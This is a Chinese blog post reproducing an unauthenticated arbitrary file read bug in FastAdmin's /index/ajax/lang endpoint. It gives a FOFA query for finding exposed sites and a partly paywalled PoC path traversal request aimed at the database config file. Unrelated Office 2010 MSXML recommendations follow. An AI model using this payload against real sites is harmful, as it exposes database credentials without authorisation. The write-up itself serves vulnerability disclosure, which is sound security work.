FastAdmin后台开发框架 lang 任意文件读取漏洞复现

已于 2024-06-17 11:46:21 修改
阅读量4k 收藏 2
点赞数 2
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-06-17 10:51:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139737287
版权

0x01 产品简介

FastAdmin是一款基于PHP+Bootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。

0x02 漏洞概述

FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x04 漏洞复现

PoC

GET /index/ajax/lang?lang=../../application/database HTT
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Win7安装Office2010提示需要MSXML 6.10.1129.0组件的解决方案
最新发布
nntxthml的博客
03-03 1350
Office2010是一款界面非常简洁的Office办公软件,它凭借其强大的功能和用户友好的界面设计,赢得了广大用户的喜爱。最近,一位用户在Win7系统下安装Office2010时遇到了错误,系统弹出提示安装程序无法继续,若要安装Microsoft Office 2010,需要在计算机上安装MSXML版本6.10.1129.0组件”。通过本文的介绍,我们了解了在Win7系统下安装Office2010时遇到“需要MSXML 6.10.1129.0组件”问题的解决方法。,单击右键,然后选择“权限”。
Office2010安装错误:若要安装Microsoft Office 2010,需要在计算机上安装MSXML版本6.10.1129.0。请安装此组件,然后重新运行安装程序。
2401_84049876的博客
04-28 3324
a、开始–运行或者win+r,输入regedit找到HKEY_CLASSES_ROOT\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\6.0\0\win32。b、如果没有该项,需要自己手动建立,本人就是只找到了{F5078F18-C551-11D3-89B9-0000F81FE221},但是并没有找到6.0,自己手动的。c、单击WIN32,在右边的窗口,双击“默认值”,在数值里面输入C:\Windows\System32\msxml6.dll。
安装Microsoft Office 2010 提示需要安装MSXML版本6.10.1129.0 的解决
c_lanxiaofang的博客
05-22 16万+
打开连接:https://www.microsoft.com/zh-cn/download/details.aspx?id=6276对于上面三个选择下载哪个的判断可以参考博客:https://blog.csdn.net/c_lanxiaofang/article/details/80410925:msxml6_x86.msi和msxml6_ia64.msi和msxml6_x64.msi的选择我选 ...
Office2010 提示MSXML 6.10.1129.0
12-15
Win7装不上Office2010 提示MSXML 6.10.1129.0
msxml 6.10.1129.0
06-15
现在将msxml 6.10.1129.0文件下的msxml6_ia64.msi、msxml6_x64.msi和msxml6_x86.msi三个独立安装文件,压缩到一个文件中,如有需要可解压人选一个安装后重启,即可使用。
office 2010 安装
long594531261的博客
11-26 904
二、http://www.microsoft.com/zh-cn/download/confirmation.aspx?id=6276,下载msxml6.dll 三、注册: Win7装不上Office2010 提示MSXML 6.10.1129.0的解决办法 1、下载MSXML6.10.1129.0进行安装 2、若本机已安装过不管用: a、在运行里输入:reg
安装Office2010提示需要MSXML版本6.10.1129.0的解决方法
三尺醉红尘的博客
02-05 1万+
将你自己的用户权限设置为完全控制,即在完全控制右边的允许下面的方框打上勾。完成后点击应用,再点击确定。,之前安装的时候都没有遇到这个提示,下面分享解决办法,内附。步的两次运行注意不要搞错顺序或运行成一样的了,注意区别。,在微软官方下载中心就能下载。、我们单击左下角的开始,在下方搜索框里输入。,然后选中右边的默认后右键单击再选择修改。,看能不能成功,不能的话继续下面的步骤。看能不能成功,不能的话继续下面的步骤。,输入正确的密钥就能安装成功了。的话,那么就自己新建一个。呼出运行,在运行里输入。
Win7装不上Office2010 提示MSXML 6.10.1129.0
09-14
Win7装不上Office2010 提示MSXML 6.10.1129.0
Office2010安装需要MSXML版本6.10.1129.0的方法
11-22
Office2010安装需要MSXML版本6.10.1129.0的方法 MSXML(Microsoft XML Core Services)是Microsoft提供的一种XML解析器,用于解析和处理XML文档。在安装Office2010时,需要安装MSXML版本6.10.1129.0,这是因为...
安装Office2010需要MSXML6.10.1129
07-07
解决若要安装 Microsoft Office 2010,需要MSXML 版本 6.10.1129的问题 方法如下: 1、单击 开始单击 运行键入 注册表编辑器然后单击 确定. 2、找到HKEY_CLASSES_ROOT\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221...
msxml6.10.1129.0(office2010安装提示缺少msxml组件).rar.zip
06-28
标题中的“msxml6.10.1129.0(office2010安装提示缺少msxml组件).rar.zip”表明这是一个压缩文件,包含了用于解决Microsoft Office 2010安装过程中出现的错误问题的组件。MSXML,全称Microsoft XML Core Services,是...
MSXML 6.10.1129.0
02-21
安装软件时,为什么系统会提示“需要在计算机上安装MSXML版本6.10.1129.0,然后重新运行安装程序”? 系统自带的XML版本一般比提示版本更高,只是注册表没有安装程序需要的注册项而已。用户可尝试以下方法: 1、单击“开始运行”,键入注册表编辑器然后单击“确定”. 2、找到HKEY_CLASSES_ROOTTypeLib{F5078F18-C551-11D3-89B9-0000F81FE221}.0win32。 3、用鼠标右键单击【win32】然后单击“权限”为自己授予完全控制到的项。 4、双击 (默认值) 在下的值 win32然后再更改它的值从%SystemRoot%System32msxml6.dll到C:WindowsSystem32msxml6.dll。 5、重新安装 Office 2010
解决安装office 提示错误,安装MSXML 版本 6.10.1129.0 依旧不可以问题
01-25
office 提示错误 : 若要安装 Microsoft Office 2010,需要在计算机上安装 MSXML 版本 6.10.1129.0。请安装此组件,然后重新运行安装程序。 请更正上面列出的问题,然后重新运行安装程序。 直接打开该资源,即可秒杀该问题
Microsoft visio 2010msxml 6.10.1129.0
01-09
WIN7 64位系统,安装office 2010提示如下错误: 由于下列原因,安装程序无法继续:若要安装Microsoft office 2010,需要在计算机上安装MSXML版本6.10.1129.0.安装此组件,然后重新运行安装程序。
Win7安装Office2010提示需要安装MSXML 6.10.1129.0
04-24
Win7安装Office2010提示需要安装MSXML 6.10.1129.0,解决方法可参考http://blog.csdn.net/gnail_oug/article/details/51236258 该压缩包里包含msxml6_x64.msi和msxml6_x86.msi
office2010安装MSXML版本6.10.1129.0详解解决方案
热门推荐
常钛
09-04 16万+
office2010安装提示报错 由于下列原因,安装程序无法继续,需要计算机安装MSXML版本6.10.1129.0 桌面“计算机”图标右键单击→“属性”(从这里了解自己电脑是64位操作系统还是32位)    下载MSXML 6.10.1129.0  32位与64位,建议都可以下载安装一下 官方下载地址:http://www.microsoft.com/zh-cn/download/d...
msxml6 x86.msi v6.10.1129.0
qq_43471089的博客
11-06 1282
1、msxml6 x86.msi是MSXML 6.0的32位版的安装包,MSXML即微软XML解析器,一些应用需要用到这个XML解析器,最为常见的是Microsoft Office 2010需要MSXML 6.0或更高版本msxml6 x86.msi仅适用于32位 Office 201064位Office 2010安装msxml6 x64.msi ...
安装Office2010提示需要MSXML版本6.10.1129.0
QQ1012421396的博客
04-07 2773
安装Office安装Office2010提示需要MSXML版本6.10.1129.02010提示需要MSXML版本6.10.1129.0 注意事项: 1、第4步的两次运行注意不要搞错顺序或运行成一样的了,注意区别。 2、注册表里找不到6.0就自己新建,但一定要建立完整。 3、获取权限不成功的话请自行查阅win7获取权限方面的资料。 来源: http:/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值